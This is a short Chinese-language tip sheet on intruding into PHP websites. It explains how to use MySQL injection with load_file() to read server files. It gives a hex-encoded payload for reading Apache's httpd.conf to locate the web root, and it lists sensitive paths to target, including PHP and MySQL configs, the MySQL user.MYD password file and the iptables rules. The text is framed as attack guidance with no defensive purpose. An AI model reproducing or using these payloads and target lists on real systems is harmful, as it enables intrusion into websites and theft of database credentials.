入侵php网站需注意哪些

1.linux下寻找web绝对路径的办法 
这个办法很简单 一般来说,linux+apache+mysql是常见搭配,mysql注入可以使用load_file来读取文件信息.但需要知道web绝对路径. 

我使用了如下方法: 

读取默认的apache的httpd.conf文件.这是个配置文件,ascii码.里面有个document root变量,后接的就是网站的绝对路径.对于虚拟机,有专门的vitual host开头的一系列配置. 

apache的默认路径:/etc/httpd/conf/httpd.conf 

读取code:load_file(0x2F6574632F68747470642F636F6E662F68747470642E636F6E66) 

2.查看常用的一些配置文件  

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件 
/usr/local/apache2/conf/httpd.conf 
/usr/local/app/php5/lib/php.ini //PHP相关设置 
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置 
/etc/my.cnf //mysql的配置文件 
/etc/redhat-release //系统版本 
C:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码 
/etc/sysconfig/iptables //从中得到防火墙规则策略 

不是所有的linux都有/etc/redhat-release文件的。这个只能说明是redhat，读系统版本还是读取/etc/issue 或者 /etc/issue.net